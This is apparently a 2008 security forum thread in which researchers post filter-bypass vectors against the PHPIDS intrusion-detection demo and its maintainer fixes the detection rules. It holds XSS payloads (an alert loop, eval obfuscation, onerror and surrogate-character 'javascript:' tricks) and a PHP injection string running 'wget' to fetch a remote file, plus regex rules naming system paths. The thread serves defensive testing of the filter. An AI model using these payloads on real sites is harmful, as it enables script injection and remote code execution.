Most annoying one ever :)

do alert(1);while(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Eeek - annoying indeed. and fixed. damn - i am surprised this still worked. do I have to say great find again or is this already implicitly included? ;)

Thanks!

two stage injection, with thanks to Gareth

code is:

switch('foo bar foo bar foo bar') {case eval(new Array + ('eva') + new Array + ('l(n') + new Array + ('ame) + new Array') + new Array):}

@thornmaker

Nice! :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

another variation, slightly shorter

code:

if(0){} else eval(new Array + ('eva') + new Array + ('l(n') + new Array + ('ame) + new Array') + new Array)
'foo bar foo bar foo'

warning, this might DOS your browser. at least it does for me with firefox 3 beta. opera nicely lets you opt out of the alerts. it doesn't run in IE.

Hi, I wasn't online most of the weekend - so the fixes have been a little bit delayed. The last one is really weird - and i wasn't really sure how to categorize it. I added a new rule fragment to one of the DoS rules - hmmmmm.

Nice finds anyway - thx a lot ;)

Btw - I am currently in testing phase for the new html option - so you can use the PHPIDS in combination with WYSIWYG editors. I will set up a private demo during the next days - the public one will follow later. Anyone interested in the link please drop me a line!

The current roadmap:

0.4.8 - during the next days (rule fixes, converter fixes, more verbosity of the centrifuge)

0.5 - approximately in two or three weeks (same like above plus the html feature)

Greetings,
.mario

I haven't tested them all individually, but at least onfocus alone will still get the job done.



Edited 1 time(s). Last edit at 06/02/2008 08:39AM by thornmaker.

@thornmaker

Nice1 again :)

@mario

Count me in of course!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@.mario: link me, I wanna play ! :)

-tx @ lowtech-labs.org

@all: Will be done as soon as ready - I think I will have sth testable online around saturday.

@thornmaker: hmmmmm - kay. will take care of this asap!

The HTML demo is online - no extra link - just the normal demo with a checkbox. Have fun! (but don't expect wonders - it's the very first testing version ;) )

Example:
HTML allowed
HTML not allowed

HTML allowed (with vector)
HTML not allowed (with vector)

@mario

cool!

I'm confused though, how come this isn't allowed?
http://demo.php-ids.org/?test=%3Cimg+src%3D%22http%3A%2F%2Fwww.google.de%2F%22+%2F%3E&html=on

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Could be a HTMLPurifier configuration issue - lemme check...

It's the missing alt attribute ;)

okay - found the issue and fixed it... i guess there are some more tricky tags with mandatory attributes etc.



Edited 2 time(s). Last edit at 06/06/2008 10:42AM by .mario.

IE8 vector:-

http://demo.php-ids.org/?test=<img%20src=""%20onerror%0C=alert(1)%20alt=1>&html=on

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 3 time(s). Last edit at 06/08/2008 03:15AM by Gareth Heyes.

Ouch and thx - there was a problem in the _diff() method when handling data which was added by the HTMLPurifier. That issue is now fixed besides several other problems.

What still could work is hiding for example SQL injection attack vectors inside HTML attributes. Just pump the vector into the let's say alt tag and neither the PHPIDS nor the HTMLPurifier will notice/do something. I am working on that - but the issue is pretty complicated.

Example



Edited 1 time(s). Last edit at 06/08/2008 08:04AM by .mario.

My javascript protocol fuzzer found some very interesting RTL chars in FF 2.0.0.14

Char: 56320, link: jav&#56320ascript:
Char: 56321, link: jav&#56321ascript:
Char: 56322, link: jav&#56322ascript:
Char: 56323, link: jav&#56323ascript:
Char: 56324, link: jav&#56324ascript:
Char: 56325, link: jav&#56325ascript:
,, ,, ,, ,,

All the way to:-
char: 57343, link: jav&#57343ascript:

These links can get passed the PHPIDS using different placement of the characters
e.g.
<a href="jav&#56325ascript:al&#56325ert(1)">test</a>

Or similar combination

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

I couldn't get that to execute Gareth. Below is what I receive in return from my browser:

Access forbidden!

You don't have permission to access the requested object. It is either read-protected or not readable by the server.

If you think this is a server error, please contact the webmaster.
Error 403
localhost
06/26/08 08:44:33

The url in the address bar is: http://localhost/jav%EF%BF%BDascript:al%EF%BF%BDert(1)

Run on Apache 2.2.8 and accessed in FF3.

-----------------------------------------------------------------------
(ú=(&#952;='',[µ=!(&#934;=!&#952;+{})+&#952;,&#920;=&#934;[ø=+!&#952;]+&#934;[+&#952;],&#297;=µ[ø],Ø=µ[º=ø+++ø],Ç=&#934;[º+ø],à=ú[&#934;[º+º]+&#934;[+&#952;]+Ç+&#297;]][Ø+Ç+&#920;])())[&#297;+à('&#149;êí')](Ç+à('Á«)'))

@matt

FF 2.0.0.14 only I'm afraid :(

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

AAAhhhhhh!

-----------------------------------------------------------------------
(ú=(&#952;='',[µ=!(&#934;=!&#952;+{})+&#952;,&#920;=&#934;[ø=+!&#952;]+&#934;[+&#952;],&#297;=µ[ø],Ø=µ[º=ø+++ø],Ç=&#934;[º+ø],à=ú[&#934;[º+º]+&#934;[+&#952;]+Ç+&#297;]][Ø+Ç+&#920;])())[&#297;+à('&#149;êí')](Ç+à('Á«)'))

Hex entities also work if you use a semi-colon:-

From:
Char: 56320, link: jav&#xdc00;ascript:

To:
Char: 57343, link: jav&#xdfff;ascript:

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Heya,

Finally getting some time and resurrecting the .NETIDS, which was having severe memory consumption issues in its last build :/

Anyway, found a bug in one of the Regex expressions in convertFromJSCharcode:

if (preg_match_all('/\d*[+-\/\* ]\d+/', $char, $matches)) {

This should match optional digits, + or - or / or * or \s, and then digits.

It actually matches optional digits, anything in the ascii range + to / (because inside [] the - functions as a go between indicator), and then digits.

All that needs to be done is to escape the - as \-.

Hope that helps,

Martin

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Hey Martin - sorry for taking so long to answer. You are right - that +- matches a range indeed. I will deploy the fix tomorrow first thing.

Thx & goods to see you here again ;)
.mario

what about logfile poisoning? isn't this possible?

Might I suggest for some possible speed improvements and readability you use the character class 'xdigit' such as [:xdigit:] instead of [a-f0-9] and maybe replacing AND|OR|XOR|NAND|NOT with N?AND|X?OR|NOT

Also correct me if I am wrong can't [-\w\/\\\*] be written as [-\w/\\*]
I was aware you do not need to escape the characters since they are within the [ ] and only chars to escape are [ and ]. I haven't played around with this stuff for awhile so my memory could be off so don't take my word on this.

@SpoofGhost: What exactly do you mean?

@CM: Nup - unfortunately not - the stupid double escaping is a PHP issue on some versions. The N?AND issue on the other hand is definitely valid - will find its way into the 0.5.2. Thanks man!

Sorry for being pretty unresponsive lately - I can't access slackers from my workplace since our static IP gets banned over and over again... so I can only access the forum form @home - where I crashed pretty seldom the last weeks.

Did you look into the [:xdigit:] class?


(bin|home|conf|usr|etc|proc|opt|sbin|local|dev|tmp|kern|boot|root|sys|system|windows|winnt|program|

can be:

(home|conf|usr|etc|proc|opt|s?bin|local|dev|tmp|kern|[br]oot|sys|system|windows|winnt|program|


join|pop|push|reverse|shift|slice|splice|sort|unshift

can be:

join|pop|push|reverse|shift|sp?lice|sort|unshift


echo|print|print_r|var_dump|fopen|popen

can be:

echo|print|print_r|var_dump|[fp]open


(?:http|ftp|https)

can be:

(?:https?|ftp)


Those were all the simple ones I could find in my spare time which did not end up using parentheses which would slow the regex down.

Was the spaces that were added to (N?AND|X?OR|NOT ) intentional or a typo when doing search and replace?

Also (?:CONCAT|CHAR|CONCAT|LOAD_FILE|0x) you have CONCAT twice.

Hi,

all optimizations valid - just committed them into the trunk. Thanks a lot! And yes - the last two issues you mentioned were typos ;) Fixed.

Greetings and have a nice weekend,
.mario

I noticed this in a lot of places you use:

[^:\s\w,.-\/?+]

did you mean it to be:

[^:\s\w,.\/?+-]

otherwise it will think its a char range from . to / which according to ASCII table is just those 2 chars, so the - is unneeded if it was meant to be a range or the - is being ignored if it was meant to be an included char.

Some other possible ones too:

[+&!-@]
[+-<>=]
[+-=\s]

http://demo.php-ids.org/?test=/etc/passwd
is taken as alphanumeric, so signature is not matched

hxxp://demo.php-ids.org/?test=skipcentrifuge {${`wget hxxp://example.com/x.php`}}
my favourite eval/preg_replace exploit


edit: removing second link, was broken by forum



Edited 2 time(s). Last edit at 07/29/2008 12:17PM by lpilorz.